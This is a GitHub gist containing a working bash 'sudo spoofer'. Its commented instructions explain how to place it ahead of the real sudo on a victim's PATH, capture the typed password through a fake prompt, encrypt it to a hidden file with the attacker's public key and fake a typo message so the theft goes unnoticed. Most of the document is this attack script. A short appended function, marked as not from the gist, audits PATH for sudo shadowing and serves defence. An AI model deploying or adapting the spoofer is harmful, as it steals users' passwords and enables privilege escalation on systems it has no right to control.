@YSaxon
Last active September 8, 2022 14:11
bash sudo spoofer, to obtain a user's password if you have RCE but need their password to sudo
#step 1: generate an RSA public/private keypair, and write your public key into the script below
#step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
#step 3: after you obtain the encrypted password, decrypt it with: cat .penc | openssl rsautl -decrypt -inkey your_key.priv
#note that you could easily modify this to spoof other password-taking utils like sudosh or su
sudo=`which -a sudo | head -n 2 | tail -n 1` #you could also just edit this to put in the location of real sudo yourself
if [ -s ~/.penc ] #the script has already run
then
    $sudo "$@" #just forward it straight to real sudo
else
    read -p "[sudo] password for $(whoami): " -s p #you might need to modify the prompt based on the sudo platform
    #replace this with your public key, or you won't be able to decrypt it!!
    cat << EOF > ~/.penc
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1LMw8fHhxweSLGhw+n+3
t57lEDScuVFnkiqOxsM1hhHX1Q+Vz4c8EBQkCexsz52Z7WaJYr8UgrnlDjh1QYio
yOzmlu1jjPWOX44faOcvtYzF426Bqotxst90oHe9B1nWzodEtrALi2NDdAoi8I9y
koYPBjxbxn21/XYHQ/9EhqHgO/AQoNgdjji3J874w/8P50XFO/DBJe6rRSpy67Os
HnipEZo+Wb212jTCoI63MoVkjhaa9BzPIHFi/QxKznyILyKjxghAbJibvFF6DXn3
fMO8tCn1NcxP1pZucEJE0JbsDb4zGa3x7X1il1gZQiQwm/UJLwOzmTDiwyIAMncU
JQIDAQAB
-----END PUBLIC KEY-----
EOF
    echo $p | openssl rsautl -encrypt -inkey ~/.penc -pubin -out ~/.penc; unset p #encrypt the password with your public key
    #this would be a good place to try to exfiltrate the ~/.penc file; otherwise, just come back and look for it later
    #as an alternative here, if the sudo on your platform supports it, consider: echo $p | sudo -S "$@"
    echo; echo 'Sorry, try again.' && $sudo "$@" #tell them they got it wrong, and they'll assume it's just a typo, then forward them to real sudo
    #alternatively, depending on your platform, you could try forwarding the actual password directly to sudo, but not every sudo will take that
fi
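An added defensive check, not part of the gist, for the condition step 2 depends on: a "sudo" that resolves before the real root-owned setuid binary, or a user-writable directory ahead of it on PATH. The file name sudo_path_audit.sh is assumed.

```shell
#!/bin/sh
# Added example (not from the gist): audit a PATH string for sudo shadowing.
# A shim like the one above only works if a "sudo" resolves before the real,
# root-owned setuid binary, or if someone can drop one into a writable
# directory that precedes it. audit_sudo_path reports both conditions.
# Returns 0 when the first "sudo" on PATH is root-owned setuid and no
# user-writable directory precedes it; 1 otherwise (or if no sudo is found).
audit_sudo_path() {
    _pl=${1:-$PATH}   # PATH string to audit, in lookup order
    _seen=0           # set once the first "sudo" has been examined
    _bad=0            # 1 if anything suspicious was found
    _oifs=$IFS
    IFS=:; set -f     # split on ':' only, no glob expansion of entries
    for _dir in $_pl; do
        [ -z "$_dir" ] && _dir=.   # an empty entry means the current directory
        if [ "$_seen" -eq 0 ] && [ -d "$_dir" ] && [ -w "$_dir" ]; then
            echo "WARN: $_dir is writable and precedes the first sudo"
            _bad=1
        fi
        _cand=$_dir/sudo
        [ -e "$_cand" ] || continue
        # trusted only if owned by root AND setuid (POSIX find tests)
        if [ -n "$(find "$_cand" -user root -perm -4000 -print 2>/dev/null)" ]; then
            echo "OK:   $_cand is root-owned and setuid"
        else
            echo "WARN: $_cand is not root-owned setuid (possible shim)"
            [ "$_seen" -eq 0 ] && _bad=1
        fi
        _seen=1
    done
    IFS=$_oifs; set +f
    if [ "$_seen" -eq 0 ]; then
        echo "WARN: no sudo found on PATH"
        _bad=1
    fi
    return $_bad
}

# Stand-alone use (assumed file name): sh sudo_path_audit.sh; the exit
# status is the audit result. When sourced, only the function is defined.
case "${0##*/}" in sudo_path_audit.sh) audit_sudo_path "$PATH" ;; esac
```

Run it as the unprivileged user whose PATH is being checked; as root every directory tests writable, so the writability warning carries no information there.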